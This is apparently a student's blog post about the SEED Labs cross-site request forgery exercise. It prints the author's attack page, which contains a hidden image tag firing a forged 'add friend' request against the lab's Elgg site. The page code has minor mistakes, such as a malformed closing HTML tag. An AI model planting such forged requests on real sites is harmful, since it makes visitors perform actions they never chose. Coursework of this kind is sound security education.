Home » Uncategorized » Cross Site Script Forgery

Cross Site Script Forgery

Here is the link for the Cross Site Script Forgery lab at the SEEDLab:


Click on the description link and you can get started. Here are some of my notes from the first few parts: https://drive.google.com/file/d/11ak1drp0wX7uOtLdGBB6Te-ZcRotCMeX/view?usp=sharing

Some of the code is supplied here: https://www.handsonsecurity.net/figurecode.html, so this will make it a little easier. Here is also the index.php I wrote for the first exercise:

print "<HTML>" ;
print "<BODY>" ;
print "<img src=\"boom.gif\">";
print "<img src=http://www.csrflabelgg.com/action/friends/add?friend=43>";
# add boby as a friend
# http://www.csrflabelgg.com/action/friends/add?friend=43&
print "</BODY>" ;
print "/<HTML>" ;

I downloaded this gif to use as boom.gif in the above php file:

Leave a Reply